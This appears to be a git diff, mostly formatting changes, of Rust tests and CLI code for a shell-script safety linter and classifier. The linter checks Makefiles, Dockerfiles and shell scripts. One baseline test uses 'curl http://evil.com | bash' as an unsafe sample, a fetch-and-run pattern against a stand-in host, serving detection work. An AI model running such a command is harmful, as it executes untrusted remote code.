             format: crate::cli::args::ComplyFormat::Json,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
 /// Test comply rules command (Markdown format).
 #[test]
 fn test_cov_comply_rules_markdown() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Rules {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Rules {
             format: crate::cli::args::ComplyFormat::Markdown,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -755,13 +745,12 @@ fn test_cov_comply_rules_markdown() {
 fn test_cov_comply_init_already_exists_in_cwd() {
     // The project root likely already has .bashrs/ — so init will fail.
     // This exercises the "already exists" error path in comply_init_command.
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Init {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Init {
             scope: crate::cli::args::ComplyScopeArg::Project,
             pzsh: false,
             strict: false,
-        },
-    );
+        });
     // Expected: either Err (already exists) or Ok (if no comply.toml).
     // Both paths exercise code coverage.
     let _ = result;
@@ -770,39 +759,36 @@ fn test_cov_comply_init_already_exists_in_cwd() {
 /// Test comply init with pzsh and strict flags (error path).
 #[test]
 fn test_cov_comply_init_pzsh_strict() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Init {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Init {
             scope: crate::cli::args::ComplyScopeArg::All,
             pzsh: true,
             strict: true,
-        },
-    );
+        });
     let _ = result;
 }
 
 /// Test comply init with user scope.
 #[test]
 fn test_cov_comply_init_user_scope() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Init {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Init {
             scope: crate::cli::args::ComplyScopeArg::User,
             pzsh: false,
             strict: false,
-        },
-    );
+        });
     let _ = result;
 }
 
 /// Test comply init with system scope.
 #[test]
 fn test_cov_comply_init_system_scope() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Init {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Init {
             scope: crate::cli::args::ComplyScopeArg::System,
             pzsh: false,
             strict: true,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -817,14 +803,13 @@ fn test_cov_comply_track_discover() {
     )
     .unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Track {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Track {
             command: crate::cli::args::ComplyTrackCommands::Discover {
                 path: dir.path().to_path_buf(),
                 scope: crate::cli::args::ComplyScopeArg::Project,
             },
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -834,14 +819,13 @@ fn test_cov_comply_track_discover_all() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Track {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Track {
             command: crate::cli::args::ComplyTrackCommands::Discover {
                 path: dir.path().to_path_buf(),
                 scope: crate::cli::args::ComplyScopeArg::All,
             },
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -851,14 +835,13 @@ fn test_cov_comply_track_list() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Track {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Track {
             command: crate::cli::args::ComplyTrackCommands::List {
                 path: dir.path().to_path_buf(),
                 scope: None,
             },
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -868,14 +851,13 @@ fn test_cov_comply_track_list_project() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Track {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Track {
             command: crate::cli::args::ComplyTrackCommands::List {
                 path: dir.path().to_path_buf(),
                 scope: Some(crate::cli::args::ComplyScopeArg::Project),
             },
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -883,16 +865,15 @@ fn test_cov_comply_track_list_project() {
 #[test]
 fn test_cov_comply_check_scope_user() {
     let dir = TempDir::new().unwrap();
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: Some(crate::cli::args::ComplyScopeArg::User),
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -900,16 +881,15 @@ fn test_cov_comply_check_scope_user() {
 #[test]
 fn test_cov_comply_check_scope_system() {
     let dir = TempDir::new().unwrap();
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: Some(crate::cli::args::ComplyScopeArg::System),
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -917,16 +897,15 @@ fn test_cov_comply_check_scope_system() {
 #[test]
 fn test_cov_comply_check_scope_all() {
     let dir = TempDir::new().unwrap();
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: Some(crate::cli::args::ComplyScopeArg::All),
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -1005,15 +984,14 @@ fn test_cov_config_purify_dry_run() {
     )
     .unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Purify {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Purify {
             input: file,
             output: None,
             fix: false,
             no_backup: false,
             dry_run: true,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1029,15 +1007,14 @@ fn test_cov_config_purify_output_file() {
     )
     .unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Purify {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Purify {
             input,
             output: Some(output.clone()),
             fix: false,
             no_backup: false,
             dry_run: false,
-        },
-    );
+        });
     assert!(result.is_ok());
     assert!(output.exists());
 }
@@ -1050,15 +1027,14 @@ fn test_cov_config_purify_stdout() {
     fs::write(&input, "#!/bin/bash\nexport EDITOR=vim\n").unwrap();
 
     let stdout_path = PathBuf::from("-");
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Purify {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Purify {
             input,
             output: Some(stdout_path),
             fix: false,
             no_backup: false,
             dry_run: false,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1073,15 +1049,14 @@ fn test_cov_config_purify_fix_inplace() {
     )
     .unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Purify {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Purify {
             input,
             output: None,
             fix: true,
             no_backup: false,
             dry_run: false,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1096,15 +1071,14 @@ fn test_cov_config_purify_fix_no_backup() {
     )
     .unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Purify {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Purify {
             input,
             output: None,
             fix: true,
             no_backup: true,
             dry_run: false,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1158,12 +1132,11 @@ fn test_cov_config_dispatch_analyze() {
     let file = dir.path().join(".bashrc");
     fs::write(&file, "#!/bin/bash\nexport EDITOR=vim\n").unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Analyze {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Analyze {
             input: file,
             format: ConfigOutputFormat::Human,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1178,12 +1151,11 @@ fn test_cov_config_dispatch_lint() {
     // Minimal clean config to avoid process::exit(1)
     fs::write(&file, "# Clean zshrc config\n").unwrap();
 
-    let result = super::config_cmds::handle_config_command(
-        crate::cli::args::ConfigCommands::Lint {
+    let result =
+        super::config_cmds::handle_config_command(crate::cli::args::ConfigCommands::Lint {
             input: file,
             format: ConfigOutputFormat::Human,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -1303,10 +1275,7 @@ min_score = 85.0
 #[test]
 fn test_cov_gate_invalid_tier() {
     // Uses the project root's .pmat-gates.toml. Tier 99 is invalid.
-    let result = super::gate_cmds::handle_gate_command(
-        99,
-        crate::cli::args::ReportFormat::Human,
-    );
+    let result = super::gate_cmds::handle_gate_command(99, crate::cli::args::ReportFormat::Human);
     // Should fail with "Invalid tier: 99"
     assert!(result.is_err());
 }
@@ -1314,10 +1283,7 @@ fn test_cov_gate_invalid_tier() {
 /// Test handle_gate_command with tier 0 (also invalid).
 #[test]
 fn test_cov_gate_tier_zero() {
-    let result = super::gate_cmds::handle_gate_command(
-        0,
-        crate::cli::args::ReportFormat::Human,
-    );
+    let result = super::gate_cmds::handle_gate_command(0, crate::cli::args::ReportFormat::Human);
     assert!(result.is_err());
 }
 
@@ -1469,11 +1435,7 @@ fn test_cov_devcontainer_validate_lint_dockerfile() {
 fn test_cov_devcontainer_validate_direct_file() {
     let dir = TempDir::new().unwrap();
     let file = dir.path().join("devcontainer.json");
-    fs::write(
-        &file,
-        r#"{"name": "Direct", "image": "ubuntu:22.04"}"#,
-    )
-    .unwrap();
+    fs::write(&file, r#"{"name": "Direct", "image": "ubuntu:22.04"}"#).unwrap();
 
     let result = super::devcontainer_cmds::handle_devcontainer_command(
         crate::cli::args::DevContainerCommands::Validate {
@@ -1540,12 +1502,7 @@ test_echo() {
     )
     .unwrap();
 
-    let result = test_command(
-        &file,
-        crate::cli::args::TestOutputFormat::Human,
-        true,
-        None,
-    );
+    let result = test_command(&file, crate::cli::args::TestOutputFormat::Human, true, None);
     let _ = result;
 }
 
@@ -1564,12 +1521,7 @@ test_basic() {
     )
     .unwrap();
 
-    let result = test_command(
-        &file,
-        crate::cli::args::TestOutputFormat::Json,
-        false,
-        None,
-    );
+    let result = test_command(&file, crate::cli::args::TestOutputFormat::Json, false, None);
     let _ = result;
 }
 

--- a/rash/src/cli/commands.rs
+++ b/rash/src/cli/commands.rs
@@ -696,8 +696,7 @@ fn build_command(input: &Path, output: &Path, config: Config) -> Result<()> {
     let source = fs::read_to_string(input).map_err(Error::Io)?;
 
     // Transpile (wrap errors with source context)
-    let shell_code =
-        transpile(&source, &config).map_err(|e| with_context(e, input, &source))?;
+    let shell_code = transpile(&source, &config).map_err(|e| with_context(e, input, &source))?;
 
     // Write output
     fs::write(output, shell_code).map_err(Error::Io)?;

--- a/rash/src/cli/corpus_config_commands.rs
+++ b/rash/src/cli/corpus_config_commands.rs
@@ -441,10 +441,7 @@ pub(crate) fn corpus_generate_conversations(
         "  Type A (classify): {} | Type B (fix): {} | Type C (debug): {} | Type D (safe): {}",
         report.type_a_count, report.type_b_count, report.type_c_count, report.type_d_count
     );
-    eprintln!(
-        "  Type D %:    {:.1}% (target: >=30%)",
-        report.type_d_pct
-    );
+    eprintln!("  Type D %:    {:.1}% (target: >=30%)", report.type_d_pct);
     eprintln!(
         "  Citations:   {:.0}%",
         report.rule_citation_accuracy * 100.0
@@ -668,7 +665,10 @@ pub(crate) fn corpus_tokenizer_validation() -> Result<()> {
     });
 
     println!("Tokenizer:        whitespace (baseline)");
-    println!("Acceptable:       {} ({:.1}%)", report.acceptable_count, report.acceptable_pct);
+    println!(
+        "Acceptable:       {} ({:.1}%)",
+        report.acceptable_count, report.acceptable_pct
+    );
     println!("Unacceptable:     {}", report.unacceptable_count);
     println!("Target:           >= 70% (C-TOK-001)");
     println!(
@@ -762,7 +762,10 @@ pub(crate) fn corpus_export_splits(output: Option<PathBuf>) -> Result<()> {
     let test_unsafe = result.test.iter().filter(|r| r.label == 1).count();
 
     println!("{BOLD}=== SSC v11 Dataset Split (alimentar-compatible) ==={RESET}\n");
-    println!("  {:<8} {:>6} {:>6} {:>6}  {:>6}", "Split", "Total", "Safe", "Unsafe", "%Unsafe");
+    println!(
+        "  {:<8} {:>6} {:>6} {:>6}  {:>6}",
+        "Split", "Total", "Safe", "Unsafe", "%Unsafe"
+    );
     println!("  {}", "-".repeat(45));
     println!(
         "  {:<8} {:>6} {:>6} {:>6}  {:>5.1}%",
@@ -822,8 +825,16 @@ pub(crate) fn corpus_export_splits(output: Option<PathBuf>) -> Result<()> {
             let mut out = String::new();
             for row in rows {
                 use std::fmt::Write as _;
-                let escaped_input = row.input.replace('\\', "\\\\").replace('"', "\\\"").replace('\n', "\\n");
-                let _ = writeln!(out, r#"{{"input":"{}","label":{}}}"#, escaped_input, row.label);
+                let escaped_input = row
+                    .input
+                    .replace('\\', "\\\\")
+                    .replace('"', "\\\"")
+                    .replace('\n', "\\n");
+                let _ = writeln!(
+                    out,
+                    r#"{{"input":"{}","label":{}}}"#,
+                    escaped_input, row.label
+                );
             }
             std::fs::write(&path, out)?;
             Ok(())
@@ -833,13 +844,22 @@ pub(crate) fn corpus_export_splits(output: Option<PathBuf>) -> Result<()> {
         write_split("val", &result.val).map_err(Error::Io)?;
         write_split("test", &result.test).map_err(Error::Io)?;
 
+        eprintln!("\n{GREEN}Wrote split files to {}{RESET}", dir.display());
         eprintln!(
-            "\n{GREEN}Wrote split files to {}{RESET}",
-            dir.display()
+            "  {}/train.jsonl ({} entries)",
+            dir.display(),
+            result.train.len()
         );
-        eprintln!("  {}/train.jsonl ({} entries)", dir.display(), result.train.len());
-        eprintln!("  {}/val.jsonl ({} entries)", dir.display(), result.val.len());
-        eprintln!("  {}/test.jsonl ({} entries)", dir.display(), result.test.len());
+        eprintln!(
+            "  {}/val.jsonl ({} entries)",
+            dir.display(),
+            result.val.len()
+        );
+        eprintln!(
+            "  {}/test.jsonl ({} entries)",
+            dir.display(),
+            result.test.len()
+        );
     }
 
     Ok(())

--- a/rash/src/comply/rules_tests.rs
+++ b/rash/src/comply/rules_tests.rs
@@ -283,9 +283,15 @@ fn test_determinism_urandom() {
 #[test]
 fn test_determinism_random_device() {
     let art = shell_artifact();
-    let result = check_rule(RuleId::Determinism, "dd if=/dev/random of=key bs=32 count=1", &art);
+    let result = check_rule(
+        RuleId::Determinism,
+        "dd if=/dev/random of=key bs=32 count=1",
+        &art,
+    );
     assert!(!result.passed);
-    assert!(result.violations[0].message.contains("/dev/urandom or /dev/random"));
+    assert!(result.violations[0]
+        .message
+        .contains("/dev/urandom or /dev/random"));
 }
 
 #[test]
@@ -845,7 +851,11 @@ fn test_shellcheck_read_r_ok() {
 #[test]
 fn test_shellcheck_dollar_question() {
     let art = shell_artifact();
-    let result = check_rule(RuleId::ShellCheck, "if [ $? -eq 0 ]; then echo ok; fi", &art);
+    let result = check_rule(
+        RuleId::ShellCheck,
+        "if [ $? -eq 0 ]; then echo ok; fi",
+        &art,
+    );
     assert!(!result.passed);
     assert!(result.violations[0].message.contains("SC2181"));
 }
@@ -853,7 +863,11 @@ fn test_shellcheck_dollar_question() {
 #[test]
 fn test_shellcheck_ls_iteration() {
     let art = shell_artifact();
-    let result = check_rule(RuleId::ShellCheck, "for f in $(ls *.txt); do echo $f; done", &art);
+    let result = check_rule(
+        RuleId::ShellCheck,
+        "for f in $(ls *.txt); do echo $f; done",
+        &art,
+    );
     assert!(!result.passed);
     assert!(result.violations[0].message.contains("SC2012"));
 }
@@ -877,7 +891,10 @@ fn test_make_eval_in_recipe() {
     let content = "target:\n\teval $(shell_cmd)";
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("MAKE001")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("MAKE001")));
 }
 
 #[test]
@@ -886,7 +903,10 @@ fn test_make_bare_make() {
     let content = "all:\n\tmake clean";
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("MAKE002")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("MAKE002")));
 }
 
 #[test]
@@ -896,7 +916,10 @@ fn test_make_dollar_make_ok() {
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     // No MAKE002 violation ($(MAKE) is correct)
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("MAKE002")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("MAKE002")),
         "$(MAKE) should not trigger MAKE002"
     );
 }
@@ -907,7 +930,10 @@ fn test_make_rm_rf_variable() {
     let content = "clean:\n\trm -rf $$dir";
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("MAKE003")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("MAKE003")));
 }
 
 #[test]
@@ -917,7 +943,10 @@ fn test_make_missing_phony() {
     let content = "clean:\n\trm -f *.o";
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("MAKE004")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("MAKE004")));
 }
 
 #[test]
@@ -927,7 +956,10 @@ fn test_make_phony_declared_ok() {
     let result = check_rule(RuleId::MakefileSafety, content, &art);
     // No MAKE004 violation for clean
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("MAKE004")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("MAKE004")),
         ".PHONY declared targets should not trigger MAKE004"
     );
 }
@@ -942,7 +974,10 @@ fn test_docker_add_local() {
     let content = "FROM ubuntu:22.04\nADD file.tar /opt\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER008")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER008")));
 }
 
 #[test]
@@ -952,7 +987,10 @@ fn test_docker_add_url_ok() {
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     // ADD with URL is acceptable
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER008")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER008")),
         "ADD with https URL should not trigger DOCKER008"
     );
 }
@@ -963,7 +1001,10 @@ fn test_docker_unpinned_from() {
     let content = "FROM ubuntu\nRUN echo hello\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER001")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER001")));
 }
 
 #[test]
@@ -972,7 +1013,10 @@ fn test_docker_latest_from() {
     let content = "FROM ubuntu:latest\nRUN echo hello\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER001")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER001")));
 }
 
 #[test]
@@ -981,7 +1025,10 @@ fn test_docker_pinned_from_ok() {
     let content = "FROM ubuntu:22.04\nRUN echo hello\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER001")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER001")),
         "Pinned FROM should not trigger DOCKER001"
     );
 }
@@ -989,11 +1036,13 @@ fn test_docker_pinned_from_ok() {
 #[test]
 fn test_docker_digest_ok() {
     let art = dockerfile_artifact();
-    let content =
-        "FROM ubuntu@sha256:abcdef1234567890\nRUN echo hello\nUSER appuser";
+    let content = "FROM ubuntu@sha256:abcdef1234567890\nRUN echo hello\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER001")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER001")),
         "FROM with digest should not trigger DOCKER001"
     );
 }
@@ -1004,7 +1053,10 @@ fn test_docker_scratch_ok() {
     let content = "FROM scratch\nCOPY app /app\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER001")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER001")),
         "FROM scratch should not trigger DOCKER001"
     );
 }
@@ -1015,7 +1067,10 @@ fn test_docker_apt_no_clean() {
     let content = "FROM ubuntu:22.04\nRUN apt-get install -y curl\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER003")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER003")));
 }
 
 #[test]
@@ -1024,7 +1079,10 @@ fn test_docker_apt_with_clean_ok() {
     let content = "FROM ubuntu:22.04\nRUN apt-get install -y curl && rm -rf /var/lib/apt/lists/*\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER003")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER003")),
         "apt-get with cleanup should not trigger DOCKER003"
     );
 }
@@ -1035,7 +1093,10 @@ fn test_docker_bare_expose() {
     let content = "FROM ubuntu:22.04\nEXPOSE\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER004")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER004")));
 }
 
 #[test]
@@ -1044,7 +1105,10 @@ fn test_docker_missing_user() {
     let content = "FROM ubuntu:22.04\nRUN echo hello";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(!result.passed);
-    assert!(result.violations.iter().any(|v| v.message.contains("DOCKER010")));
+    assert!(result
+        .violations
+        .iter()
+        .any(|v| v.message.contains("DOCKER010")));
 }
 
 #[test]
@@ -1053,7 +1117,10 @@ fn test_docker_has_user_ok() {
     let content = "FROM ubuntu:22.04\nRUN echo hello\nUSER appuser";
     let result = check_rule(RuleId::DockerfileBest, content, &art);
     assert!(
-        !result.violations.iter().any(|v| v.message.contains("DOCKER010")),
+        !result
+            .violations
+            .iter()
+            .any(|v| v.message.contains("DOCKER010")),
         "USER directive present should not trigger DOCKER010"
     );
 }

--- a/rash/src/comply/scoring_tests.rs
+++ b/rash/src/comply/scoring_tests.rs
@@ -77,9 +77,9 @@ fn test_artifact_score_all_passed() {
 #[test]
 fn test_artifact_score_some_failed() {
     let results = vec![
-        make_result(RuleId::Posix, true),     // weight 20
+        make_result(RuleId::Posix, true),        // weight 20
         make_result(RuleId::Determinism, false), // weight 15
-        make_result(RuleId::Security, true),   // weight 20
+        make_result(RuleId::Security, true),     // weight 20
     ];
     let score = compute_artifact_score("partial.sh", &results);
     // passed_weight = 20 + 20 = 40, total_weight = 20 + 15 + 20 = 55
@@ -119,7 +119,11 @@ fn test_artifact_score_below_60_gateway() {
         make_result(RuleId::Idempotency, false),
     ];
     let score = compute_artifact_score("bad.sh", &results);
-    assert!(score.score < 20.0, "Score {} should be capped below 20", score.score);
+    assert!(
+        score.score < 20.0,
+        "Score {} should be capped below 20",
+        score.score
+    );
     assert_eq!(score.grade, Grade::F);
 }
 
@@ -161,10 +165,13 @@ fn test_project_score_single_artifact() {
 #[test]
 fn test_project_score_multiple_mixed() {
     let good = compute_artifact_score("good.sh", &[make_result(RuleId::Posix, true)]);
-    let bad = compute_artifact_score("bad.sh", &[
-        make_result(RuleId::Posix, false),
-        make_result(RuleId::Security, false),
-    ]);
+    let bad = compute_artifact_score(
+        "bad.sh",
+        &[
+            make_result(RuleId::Posix, false),
+            make_result(RuleId::Security, false),
+        ],
+    );
     let project = compute_project_score(vec![good, bad]);
     assert_eq!(project.total_artifacts, 2);
     assert_eq!(project.compliant_artifacts, 1);

--- a/rash/src/corpus/baselines.rs
+++ b/rash/src/corpus/baselines.rs
@@ -59,14 +59,8 @@ pub fn linter_baseline(entries: &[(&str, u8)]) -> EvaluationReport {
         .iter()
         .map(|&(script, truth)| {
             let result = lint_shell(script);
-            let has_security = result
-                .diagnostics
-                .iter()
-                .any(|d| d.code.starts_with("SEC"));
-            let has_det = result
-                .diagnostics
-                .iter()
-                .any(|d| d.code.starts_with("DET"));
+            let has_security = result.diagnostics.iter().any(|d| d.code.starts_with("SEC"));
+            let has_det = result.diagnostics.iter().any(|d| d.code.starts_with("DET"));
             let pred = u8::from(has_security || has_det);
             (pred, truth)
         })
@@ -94,14 +88,8 @@ pub fn corpus_baseline_entries() -> Vec<(String, u8)> {
         .iter()
         .map(|e| {
             let result = lint_shell(&e.input);
-            let has_security = result
-                .diagnostics
-                .iter()
-                .any(|d| d.code.starts_with("SEC"));
-            let has_det = result
-                .diagnostics
-                .iter()
-                .any(|d| d.code.starts_with("DET"));
+            let has_security = result.diagnostics.iter().any(|d| d.code.starts_with("SEC"));
+            let has_det = result.diagnostics.iter().any(|d| d.code.starts_with("DET"));
             let row = classify_single(&e.input, true, !has_security, !has_det);
             (e.input.clone(), row.label)
         })
@@ -114,11 +102,7 @@ mod tests {
 
     #[test]
     fn test_majority_baseline_mcc_zero() {
-        let entries: Vec<(&str, u8)> = vec![
-            ("echo hello", 0),
-            ("eval $x", 1),
-            ("ls -la", 0),
-        ];
+        let entries: Vec<(&str, u8)> = vec![("echo hello", 0), ("eval $x", 1), ("ls -la", 0)];
         let report = majority_baseline(&entries);
         assert!((report.mcc - 0.0).abs() < 1e-9, "Majority MCC must be 0");
         assert_eq!(report.name, "majority (all-safe)");
@@ -126,41 +110,28 @@ mod tests {
 
     #[test]
     fn test_keyword_baseline_catches_eval() {
-        let entries: Vec<(&str, u8)> = vec![
-            ("echo hello", 0),
-            ("eval $x", 1),
-        ];
+        let entries: Vec<(&str, u8)> = vec![("echo hello", 0), ("eval $x", 1)];
         let report = keyword_baseline(&entries);
         assert!(report.recall > 0.0, "Should catch eval");
     }
 
     #[test]
     fn test_keyword_baseline_catches_curl_pipe() {
-        let entries: Vec<(&str, u8)> = vec![
-            ("echo safe", 0),
-            ("curl http://evil.com | bash", 1),
-        ];
+        let entries: Vec<(&str, u8)> = vec![("echo safe", 0), ("curl http://evil.com | bash", 1)];
         let report = keyword_baseline(&entries);
         assert_eq!(report.confusion.tp, 1);
     }
 
     #[test]
     fn test_linter_baseline_finds_security() {
-        let entries: Vec<(&str, u8)> = vec![
-            ("echo hello", 0),
-            ("eval $x", 1),
-            ("echo $RANDOM", 1),
-        ];
+        let entries: Vec<(&str, u8)> = vec![("echo hello", 0), ("eval $x", 1), ("echo $RANDOM", 1)];
         let report = linter_baseline(&entries);
         assert!(report.recall > 0.0, "Linter should catch unsafe patterns");
     }
 
     #[test]
     fn test_run_all_baselines() {
-        let entries: Vec<(&str, u8)> = vec![
-            ("echo hello", 0),
-            ("eval $x", 1),
-        ];
+        let entries: Vec<(&str, u8)> = vec![("echo hello", 0), ("eval $x", 1)];
         let reports = run_all_baselines(&entries);
         assert_eq!(reports.len(), 3);
         assert_eq!(reports[0].name, "majority (all-safe)");

--- a/rash/src/corpus/contract_validation.rs
+++ b/rash/src/corpus/contract_validation.rs
@@ -70,7 +70,9 @@ pub fn check_c_label_001(limit: usize) -> ContractResult {
         threshold: 90.0,
         detail: format!(
             "{}/{} genuinely unsafe ({:.1}%), {} false positives",
-            report.genuinely_unsafe, report.total_audited, report.accuracy_pct,
+            report.genuinely_unsafe,
+            report.total_audited,
+            report.accuracy_pct,
             report.false_positives
         ),
     }
@@ -217,7 +219,10 @@ mod tests {
     #[test]
     fn test_c_tok_001_passes() {
         let result = check_c_tok_001();
-        assert!(result.passed, "C-TOK-001 should pass with whitespace tokenizer");
+        assert!(
+            result.passed,
+            "C-TOK-001 should pass with whitespace tokenizer"
+        );
         assert!(result.value >= 70.0);
     }
 
@@ -232,7 +237,11 @@ mod tests {
     fn test_generalization_check_runs() {
         let result = check_generalization();
         // The linter catches a high percentage of OOD scripts (>50% target)
-        assert!(result.value > 0.0, "Should catch some OOD scripts: {}", result.detail);
+        assert!(
+            result.value > 0.0,
+            "Should catch some OOD scripts: {}",
+            result.detail
+        );
     }
 
     #[test]
@@ -245,7 +254,10 @@ mod tests {
     #[test]
     fn test_all_contracts_report() {
         let report = run_all_contracts();
-        assert!(report.contracts.len() >= 6, "Should have at least 6 contract checks");
+        assert!(
+            report.contracts.len() >= 6,
